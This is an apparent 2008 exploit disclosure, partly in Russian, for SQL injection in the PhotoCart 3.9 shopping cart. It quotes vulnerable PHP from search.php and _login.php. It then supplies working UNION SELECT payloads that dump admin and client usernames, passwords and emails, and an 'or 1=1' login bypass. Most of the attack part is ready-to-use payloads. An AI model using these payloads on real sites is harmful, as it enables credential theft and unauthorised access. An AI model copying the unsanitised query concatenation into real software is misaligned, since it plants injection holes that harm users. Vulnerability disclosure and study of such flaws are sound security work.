| ~!DoK_tOR!~ |
18.08.2008 23:38 |
PhotoCart <= 3.9 SQL Injection Vulnerability
Author: ~!Dok_tOR!~
Date found: 18.08.08
Product: PhotoCart
Version: 3.9 возможно и более ранние версии
Type: Photography Shopping Cart
URL: www.picturespro.com
Vulnerability Class: SQL Injection
/ [installdir]/search.php
Vuln code:
PHP код:
if($_REQUEST['searchby'] == "qtitle") {
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%".$_REQUEST['qtitle']."%' ";
print "Results for Gallery or event name: ".$_REQUEST['qtitle']." ";
}
if($_REQUEST['searchby'] == "qid") {
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='".$_REQUEST['qid']."' ";
print "Results for Gallery or event ID: ".$_REQUEST['qid']." ";
}
if($_REQUEST['searchby'] == "qdate") {
$gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday']."";
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' ";
print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." ";
}
magic_quotes_gpc = Off
Example:
http://[server]/ [installdir]/search.php
Вводим в поле Gallery or event name:
Exploit 1:
Код:
' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin/*
Exploit 2:
Код:
' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,client_email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from pc_clients/*
Authentication Bypass SQL Injection
/ [installdir]/_login.php
Vuln code:
PHP код:
$result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'");
Email Address: 1' or 1=1/*
Password: 1' or 1=1/*
http://milw0rm.com/exploits/6285
|
